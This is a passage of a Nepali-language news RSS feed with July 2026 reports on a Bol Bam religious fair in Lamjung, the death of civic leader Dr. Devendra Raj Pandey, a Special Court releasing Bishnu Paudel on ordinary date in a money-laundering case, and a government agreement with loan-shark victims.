नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु र समयमै उपस्थित हुन सम्पूर्ण भक्तजन महानुभावहरूलाई आयोजक संस्थाका परिकल्पनाकार एवम् अध्यक्ष ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा भब्य रुपमा बोलबम आयोजना गर्ने तयारी पुरा भएको छ ।’
वालसन्त मोहनशरण देवाचार्य महाराजश्री आज लमजुङमा आउनु भएर राइनासकोटको दृश्यावलोकन गर्नु भई साँझको बसाई सर्वोदय सेवाश्रममा नै हुने भएको र आफूहरू उहाँको साथमा त्यसतर्फ गएर फर्किदै गरेको ओलियाले जानकारी दिनु भएको छ ।
उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजन मण्डलीले संगीतमय भजन कीर्तनसमेत प्रस्तुत गर्ने कार्यक्रम छ ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गमा जलार्पण, कैलाश पर्वत परिक्रमा, १००८ शालीग्रामको दर्शनलगायत धार्मिक अनुष्ठानका पूजाअर्चना, कथावाचन, भजन किर्तन कार्यक्रम साउन महिनाभर गरिने छ ।
साथै, साउनका ११, १८ र २५ गते पर्ने सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ । ती दिनमा नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरी समापन गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।
सर्वोदय सेवाश्र रहेको धर्मनाथ धाम विश्वको नयाँ धार्मिक केन्द्र तथा गन्तव्यका रुपमा विकसित हुँदैछ ।
]]>https://www.antaranganews.com/?feed=rss2&p=501620नागरिक अगुवा डा. देवेन्द्रराज पाण्डेको निधन
https://www.antaranganews.com/?p=50119
https://www.antaranganews.com/?p=50119#respondSat, 18 Jul 2026 03:57:36 +0000https://www.antaranganews.com/?p=50119काठमाडौं– नागरिक अभियन्ता डा. देवेन्द्रराज पाण्डेको निधन भएको छ । उहाँको यहाँको विशालनगरस्थित निवासमा साउन १ गते साँझ ७ बजेर ४० मिनेटमा निधन भएको चिकित्सक डा. अनुप सुवेदीले जानकारी दिनु भएको हो । क्यान्सरबाट पीडित पाण्डेको ८७ वर्षको हुनुहुन्थ्यो ।
उहाँको अघिल्लो दिनमात्र ह्याम्स अस्पताल र पाटन अस्पतालमा उपचार गरिए पनि उपचार सम्भव नभएपछि घरमै ल्याइएको थियो । ‘उहाँ ५–६ महिनादेखि प्याङ्क्रियाजको क्यान्सरसँग लडिरहनुभएको थियो,’ डा. सुवेदीले भन्नुभयो, ‘बिहीबार दुखाई बढेपछि उहाँलाई ह्याम्स र पाटन अस्पताल लगेर उपचार गरेर घरै लगिएको थियो ।’ उहाँको अन्तिम घडीको आभास भएपछि परिवारले घरै लैजाने निर्णय गरेको थियो । करिब तीन महिनाअघि क्यान्सर प्रमाणित भएपछि उहाँ पीडा कम गर्ने औषधिको सहायता तथा नियमित उपचारसहित घरमै आराम गरेर बस्नु् भएको थियो ।
४० को दशकबाट सार्वजनिक अभियानमा होमिएका पाण्डे नेपालमा स्वावलम्बन अभियान सञ्चालनकर्ता मध्येका एक हुनुहुन्थ्यो ।
२०१७ सालमा निजामती सेवामा प्रवेश गरेका पाण्डे ३९ वर्षकै उमेरमा अर्थ मन्त्रालयको सचिव बन्नुभएको थियो । १९७८–१९८० सम्म अर्थसचिव हुनु भएका उहाँले तत्कालीन प्रधानमन्त्री सूर्यबहादुर थापासँग विवाद भएपछि राजीनामा दिनु भएको थियो । उहाँलाई नेपालका उत्कृष्ट अर्थ सचिवहरूको सूचीमा राख्ने गरिएको छ । उहाँले पदबाट स्वेच्छिक राजीनामा दिएर बहुदलको पक्षमा लाग्नु भएको थियो । २०४६ सालको जनआन्दोलनमा पेसागत फोरमबाट प्रजातन्त्र पुनः स्थापनाका लागि लडेका पाण्डे त्यसपछि गठिन कृष्णप्रसाद भट्टराई नेतृत्वको अन्तरिम सरकारमा अर्थमन्त्री हुनुहुन्थ्यो ।
उक्त अन्तरिम सरकारमा नेपाली कांग्रेस र वाममोर्चा बाहेकबाट दुई जना स्वतन्त्र नागरिक सरकारमा सामेल हुनुहुन्थ्यो । त्यसमध्ये डा. पाण्डे एक थिए भने डा. मथुरा श्रेष्ठ स्वास्थ्यमन्त्री बन्नु भएको थियो ।
संविधान जारी भएपछि २०४८ मा भएको आमनिर्वाचनमा पाण्डे लोक दल नामक पार्टी खोलेर पाल्पाबाट निर्वाचन समेत लड्नु भएको थियो ।
५० को दशकदेखि पाण्डे विभिन्न संघ–संस्थामार्फत सार्वजनिक जीवनमा सक्रिय रहनु भयो । भ्रष्टाचारविरूद्ध काम गर्ने ट्रान्सपरेन्सी इन्टरनेसनल नेपालका संस्थापकमध्ये एक उहाँ मानवअधिकार क्षेत्रमा पनि सक्रिय हुनुहुन्थ्यो ।
भारतका पूर्वप्रधानमन्त्री आइके गुजराल, पाकिस्तानी आस्मा जहाँगिरहरूसँग मिलेर डा. पाण्डेले साउथ एसियन फर ह्युमन राइट्स स्थापना गर्नु भएको थियो । केही समय निष्क्रिय रहेका पाण्डे माओवादी द्वन्द्व उत्कर्षतिर अघि बढेपछि शान्ति प्रक्रिया सुरू गर्न नागरिक तहबाट सक्रिय बन्नु भएको थियो ।
बंगलादेशमा युनुस अन्सारीले लघुवित्त अभियान थालेकै बेला डा. पाण्डेकै अगुवाइमा सन् ८० को दशकमा नेपालमा पनि त्यस्तै अभियान सुरू भएको नागरिक आन्दोलनका अर्का अभियन्ता डा. भाष्कर गौतम बताउँछन् ।
उहाँले नेपालको अर्थनीति, लोकतन्त्र, विकास तथा अन्तर्राष्ट्रिय सहयोगलगायत विषयमा नेपाली तथा अंग्रेजी दुवै भाषामा धेरैवटा पुस्तकहरु लेख्नु भएको छ । ‘नेपाल्स फेल्ड डेभलपमेन्ट’, ‘लुकिङ एट डेभलपमेन्ट एन्ड डोनर्स’, ‘नेपाली अर्थराजनीति’, ‘अर्थ–राजनीतिक विसङ्गति’, ‘नागरिक आन्दोलन र गणतान्त्रिक चेतना’, ‘लोकतन्त्रको प्राण–प्रतिष्ठा’, ‘एक ज्यान, दुई जुनी’ लगायत उहाँका प्रमुख पुस्तकहरू हुन् ।
‘मुलुकमा सशस्त्र द्वन्द्व चर्किँदै गएपछि उहाँ शान्ति स्थापनाका लागि सक्रिय रहनुभयो,’ अध्येता गौतमले भन्नुभयो, ‘२०६२–६३ को जनआन्दोलनमा उहाँले नागरिक आन्दोलनको अगुवाइ गर्नुभयो ।’
त्यस्तै, लेखक, पत्रकार तथा नागरिक आन्दोलनकारी नारायण वाग्लेले पाण्डेलाई ‘नागरिक स्वतन्त्रता, समानता, हक र चेतनाका पक्षमा सधैं खरो उभिने, लोकतन्त्रका लागि जहिल्यै संघर्षको समन्वय गर्दै नयाँ पुस्तालाई नित्य हौस्याइरहने हाम्रा अगुवा देवेन्द्रराज पाण्डे’ भनेर सम्झना गर्नु भएको छ ।
पाण्डेको निधनले नागरिक आन्दोलनले अगुवा गुमाएको भन्दै धेरैले उहाँप्रति श्रद्धा सुमन व्यक्त गरेका छन् ।
त्रिचन्द्र कलेजबाट स्नातक र भारतको इलाहावाद विश्वविद्यालयबाट अर्थशास्त्रमा स्नातकोत्तर गर्नु भएका डा. पाण्डेले अमेरिकाको पिट्सबर्ग विश्वविद्यालयबाट सार्वजनिक र अन्तर्राष्ट्रिय सम्बन्धमा विद्यावारिधि गर्नु भएको थियो ।
उहाँको आज साउन २ गते बिहान ११ बजे पशुपति आर्यघाटमा अन्तिम संस्कार गरिने पारिवारिक स्रोतले जानकारी दिएको छ ।
२० अगस्ट १९३९ मा काठमाडौंमा जन्मिएका स्वर्गीय पाण्डेकी श्रीमती पद्मा, छोरी प्रिनीति, ज्वाइँ र नाति छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=501190२० करोड ९० लाख बिगो मागदाबी गरिएका एमाले उपाध्यक्ष विष्णु पौडेललाई विशेष अदालतद्वारा साधारण तारेखमा रिहा
https://www.antaranganews.com/?p=50107
https://www.antaranganews.com/?p=50107#respondFri, 17 Jul 2026 13:40:44 +0000https://www.antaranganews.com/?p=50107काठमाडौँ– एमालेका उपाध्यक्ष एवम् पूर्वयपप्रधान तथा अर्थमन्त्री विष्णु पौडेललाई विशेष अदालतले साउन १ गते साधारण तारेखमा रिहा गर्न आदेश गरेको छ । सम्पत्ति शुद्धीकरण विभागले पौडेलविरूद्ध २० करोड ९० लाख बिगो मागदाबी लिदै हिजोमात्र शुद्धीकरण सम्बन्धी कसुरमा अभियोगपत्र दायर गरेको थियो ।
विशेष अदालतका न्यायाधीशहरू त्रय नारायणप्रसाद पौडेल, डिल्लीरत्न श्रेष्ठ र विदुर कोइरालाको इजलासले उहाँलाई साधारण तारेखमा रिहा गर्न आदेश दिएको हो ।
सम्पत्ति शुद्धीकरण अनुसन्धान विभागले पौडेल विरुद्ध विशेष अदालतमा सम्पत्ति शुद्धीकरण सम्बन्धी कसुरमा हिजोमात्रै २० करोड ९० लाख बिगो मागदाबी लिई अभियोगपत्र दायर गरेको थियो । सो मुद्दामा आज भएको थुनछेक बहसपछि अदालतले उनलाई मुद्दाको पुर्पक्षको लागि पौडेललाई साधारण तारेखमा राख्न आदेश गरेको हो ।
अदालतले तीनवटा आधार तय गर्दै पौडेललाई साधारण तारेखमा रिहा गर्ने आदेश दिएको बताइएको छ । अदालतले विष्णु पौडेलको संलग्नता तत्काल प्राप्त प्रमाणबाट नखुलेको, आरोपमाथि उनले इन्कारी बयान दिएको र दीपक भट्टसँग उनले वित्तिय कारोबार गरेको अनि सम्पत्ति वा लाभ प्राप्त गरेको नदेखिएको भन्दै विशेष अदालतले उहाँलाई सामान्य तारेखमा छाड्न आदेश दिएको जनाएको छ ।
उहाँले आफ्नो पदको दुरुपयोग गरेर व्यवसायी दीपक भट्टलाई श्रीराम टोबाको प्रालिको सेयर खरिदमा सहजीकरण गरेको सम्पत्ति शुद्धीकरणको अनुसन्धान निष्कर्ष छ । पौडेलले सहजीकरण गरेर श्रीराम टोबाको उद्योग प्रालिको २० प्रतिशत शेयर दीपक भट्टको कम्पनीलाई दिलाएको विभागको दाबी छ । तर, पौडेलले बयानमा सो अभियोग अस्वीकार गरी इन्कारी बयान दिनु भएको थियो ।
पौडेललाई सम्पत्ति शुद्धीकरण अनुसन्धान विभागले गत ८ असारमा सुर्खेतबाट नियन्त्रणमा लिएको थियो । उहाँ उपर पटकपटक म्याद थप गरी अनुसन्धान भएको थियो ।
स्मरणीय छ, पौडेललाई रिहा गर्नका लागि सर्वोच्च अदालतमा दिइएको बन्दीप्रत्यक्षीकरणको रिट समेत सर्वोच्चले खारेज गरेको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=501070सरकारले गर्यो मिटरब्याज पीडितसँग नौबुँदे सहमति : ‘पैदल न्याय मार्च’ स्थगित
https://www.antaranganews.com/?p=50101
https://www.antaranganews.com/?p=50101#respondFri, 17 Jul 2026 13:00:15 +0000https://www.antaranganews.com/?p=50101काठमाडौं– सरकारले मिटरब्याज पीडितसँग नौबुँदे सहमति गरेको छ । सहमति भएसँगै विगत ९ दिनदेखि जारी मिटरब्याजविरुद्धको आन्दोलन साउन १ गतेदेखि स्थगित भएको छ ।
गत असार २५ गते जनकपुरको त्रितियागाछीबाट सुरु भएको ‘पैदल न्याय मार्च’ बाराको निजगढ पुगेको थियो । गृहमन्त्री सुदन गुरुङ र पीडित प्रतिनिधिबीच निजगढमै काठमाडौंमा वार्ता टोली गठन गर्ने सहमति असार ३२ गते भएको थियो । सोही सहमतिबमोजिम काठमाडौं आएको पीडित पक्षको वार्ता टोली र प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालयका सचिव पुष्कर सापकोटा नेतृत्वको सरकारी टोलीबीच भएको सघन वार्ताले सहमति जुटाएको हो ।
सहमतिपत्रमा सरकारी वार्ता टोलीकातर्फबाट सचिव सापकोटा र पीडित पक्षका तर्फबाट अवधेश कुशवाहाले हस्ताक्षर गर्नु भएको छ । सो सहमति अनुसार सरकारले मिटरब्याजलाई आर्थिक अपराध मान्दै यो कूप्रथाको पूर्ण उन्मूलन भएको घोषणा गर्न आगामी मन्त्रिपरिषद्मा प्रस्ताव लैजानेछ, जसबाट सम्पूर्ण फर्जी तमसुक, दृष्टिबन्धक, छिनुवा पास र बाध्यकारी चेकहरू स्वतः अवैध र खारेज हुनेछन् ।
सहमतिअनुसार गृह मन्त्रालयले तीन महिनाभित्र विशेष विधेयकको मस्यौदा तयार गरी मिटरब्याज नियन्त्रणसम्बन्धी ऐन निर्माण गर्नेछ, जसमा मुद्दा हेर्न छुट्टै न्यायाधिकरण, पीडितको सम्पत्ति फिर्ता र उचित क्षतिपूर्तिको ग्यारेन्टी गरिनेछ ।
यसैगरी, सहमति अनुसार वडा कार्यालयमा लेनदेन प्रमाणीकरण गर्दा रकमको वैधानिक स्रोत र बैंक कारोबारको प्रमाण अनिवार्य गरिनुका साथै आपराधिक लाभ वा भ्रष्टाचारको रकम मिटरब्याजमा लगाउनेहरूमाथि कडा कारबाहीको व्यवस्था गरिनेछ ।
नयाँ ऐनमा वास्तविकभन्दा बढी रकमको कागज बनाउने, ब्याजलाई साँवामा जोड्ने, ऋणीलाई भर्पाई नदिने, बढी ब्याज लिने, धम्क्याउने, शारीरिक–मानसिक शोषण गर्ने, खाली चेक वा कागजमा जबर्जस्ती सही गराउने र सम्पत्ति हत्याउने कार्यलाई अपराध मानिने जस्ता विषय समेटिने छ ।
पीडितका गुनासो सम्बोधनका लागि केन्द्रमा प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालयका सचिवको संयोजकत्वमा उच्चस्तरीय समन्वय समिति र छुट्टै डेस्क स्थापना गरिनेछ । जिल्लास्तरमा सहायक प्रमुख जिल्ला अधिकारीको संयोजकत्वमा (पीडितका ३ प्रतिनिधिसहित) सहजीकरण समिति गठन गरी ६ महिनाभित्र सबै उजुरी फछ्र्यौट गरिनेछ, जसको अनुगमन प्रमुख जिल्ला अधिकारी नेतृत्वको समितिले गर्ने सहमति पत्रमा उल्लेख छ ।
साथै, पुनः मिटरब्याजको चक्रमा पर्न नदिन वार्षिक बजेटमा आर्थिक सहायता तथा राहत प्याकेज ल्याउने सहमति भएसँगै पीडितहरूले आन्दोलनका सम्पूर्ण कार्यक्रम स्थगित गरेका छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=501010